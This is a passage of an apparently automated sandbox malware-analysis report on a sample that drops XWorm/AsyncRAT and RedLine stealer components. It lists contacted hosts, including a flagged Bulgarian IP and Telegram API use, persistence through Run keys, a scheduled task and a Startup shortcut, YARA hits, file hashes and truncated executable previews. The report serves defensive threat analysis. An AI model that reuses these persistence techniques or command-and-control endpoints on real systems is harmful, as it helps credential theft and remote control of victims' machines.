http://tempuri.org/Endpoint/GetUpdatesLR	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateLR	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1391396246.000001CD31FF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CFA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1410582309.000001CD41E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1540160968.00000242DF871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1728788196.000001369E490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/	build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnectT	build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/0	build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1391396246.000001CD31DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CF801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD251000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	XClient.exe, 00000002.00000002.2585450577.0000000002A93000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	XClient.exe, 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1391396246.000001CD31DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CF801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD251000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/actor/next	build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
91.92.252.220	unknown	Bulgaria	34368	THEZONEBG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430686
Start date and time:	2024-04-24 02:51:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Output.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/24@2/4
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 100% Number of executed functions: 97 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Output.exe, PID 7392 because it is empty
Execution Graph export aborted for target mstc.exe, PID 5316 because it is empty
Execution Graph export aborted for target mstc.exe, PID 5508 because it is empty
Execution Graph export aborted for target mstc.exe, PID 8088 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7156 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7420 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7876 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:53:13	Task Scheduler	Run new task: mstc path: C:\Users\user\AppData\Local\Temp\mstc.exe
01:53:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mstc C:\Users\user\AppData\Local\Temp\mstc.exe
01:53:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mstc C:\Users\user\AppData\Local\Temp\mstc.exe
01:53:34	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mstc.lnk
02:52:00	API Interceptor	55x Sleep call for process: powershell.exe modified
02:53:13	API Interceptor	126x Sleep call for process: XClient.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	Ship Docs_ CI_BL_HBL_.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	sZXuT60Q6P.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Comprobante.xlam.xlsx	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	gmb.xls	Get hash	malicious	Unknown	Browse
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	z0LTqIdZ4A.exe	Get hash	malicious	XWorm	Browse
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	s.exe	Get hash	malicious	Unknown	Browse
	s.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	Ship Docs_ CI_BL_HBL_.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	sZXuT60Q6P.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
api.telegram.org	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	gmb.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	z0LTqIdZ4A.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	s.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	pdhmXuEYmc.exe	Get hash	malicious	RedLine	Browse	91.92.241.122
	Remittance slip.js	Get hash	malicious	VjW0rm	Browse	91.92.255.130
	PROFOMA INVOICE.js	Get hash	malicious	VjW0rm	Browse	91.92.255.61
	zirurEg4mX.elf	Get hash	malicious	Unknown	Browse	91.92.252.191
	qBSw7aeXEM.exe	Get hash	malicious	RedLine	Browse	91.92.250.88
	cXiIHv7tfd.exe	Get hash	malicious	Lokibot	Browse	91.92.253.228
	wQkjhw6VZ6.elf	Get hash	malicious	Gafgyt	Browse	91.92.245.31
	MFj7OCV6NX.elf	Get hash	malicious	Gafgyt	Browse	91.92.245.31
	YQKtul13uu.exe	Get hash	malicious	Lokibot	Browse	91.92.253.228
	hNqGyuEhv2.elf	Get hash	malicious	Gafgyt	Browse	91.92.245.31
TELEGRAMRU	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	171385176494b902dcff1b37e29676f3c17c0cb0090fe4b0a33f3f6a97431f2344b56a8ec2497.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	gmb.xls	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Nekark.22288.17032.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegrambot-fix.pages.dev/bot.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	http://telegrambot-fix.pages.dev/waysin	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SamFw Tool 4.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	z0LTqIdZ4A.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
TUT-ASUS	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	Ship Docs_ CI_BL_HBL_.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	sZXuT60Q6P.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://www.admin-longin.co.jp.mc3lva.cn/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://wmicrosouab-4ba8.udydzj.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	KxgGGaiW3E.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-website	Get hash	malicious	Unknown	Browse	149.154.167.220
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	CR-FEDEX_TN-775720741041.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Output.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.874682056258246
Encrypted:	false
SSDEEP:	1536:lsWpKMhKgPr9P9M331swicgAbaRr/pt1As6BpfoBOCHEUrBpQ:/pKMhb9PS3+vcHbahBApfEOk0
MD5:	5B7AC9829CDCA0B5E82604191DCC1D4E
SHA1:	5E944B6AFEA5DB67B4D272A7B02BDF5501CA213F
SHA-256:	BC8306A6F60583DE0B2A2818F1F9D1DF8E80EF29DCF46B9471E4697F219E1251
SHA-512:	505491B019E948B14500867E927C9AB48642571733B944AFC054922ED46A25EEBBFAE1615500E4755B0F022E5993CC4BD5124CF27C218A118070812E92BC1B33
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 69%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."'f.................D...........c... ........@.. ....................................@.................................\c..O.................................................................................... ............... ..H............text....C... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................c......H.......Pu..........&.....................................................(.....r...p. ......(.....r...p. E/...s.........s.........s.........s..........r5..p. ..Z..rO..p. .x!..ri..p. ....r...p. .y4..r...p..((....r...p. z....r...p. p{..(,...-.(-...,.+.(....,.+.(+...,.+.(...,..(d..."(....+."(....+.&(I...&+..+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-..r)..p. S....rC..p. .....r]..p.rw..p. 9....r...p.r...p. ....r...p. .`...r

C:\ProgramData\build.exe

Download File

Process:	C:\Users\user\Desktop\Output.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	97792
Entropy (8bit):	5.9601741982740934
Encrypted:	false
SSDEEP:	1536:xqs+1tqzClbG6jejoigIr43Ywzi0Zb78ivombfexv0ujXyyed2VtmulgS6pk:fCtAyYr+zi0ZbYe1g0ujyzdtk
MD5:	D32BDDD3639F42733A78945885002128
SHA1:	6DCFC09B8C86E79AC70A63132A5162D3616C6479
SHA-256:	34DAC9B900A3C810E466F9CAC9BA5F0A062FF2BE7719FC443CB23D0F8AC0390E
SHA-512:	B28FC39E77245D5A52AE5D25AC363C95DB8B20A960CAABC7AA4F3339B2A8D27F7F92846E2A4173FD0F776BE4034FBFE5E60B375EEBB465DBE78017D8479AD511
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\build.exe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\ProgramData\build.exe, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\ProgramData\build.exe, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\ProgramData\build.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 79%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4s... ...t.................. ..`.rsrc................v..............@..@.reloc...............\|..............@..B........................H...........(.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log

Download File

Process:	C:\Users\user\Desktop\Output.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mstc.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\mstc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\ProgramData\XClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0drb40ud.k5o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gn3glvf.qj1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mljleyk.xan.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fgr5rg2.rno.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5emqyhj1.l4k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
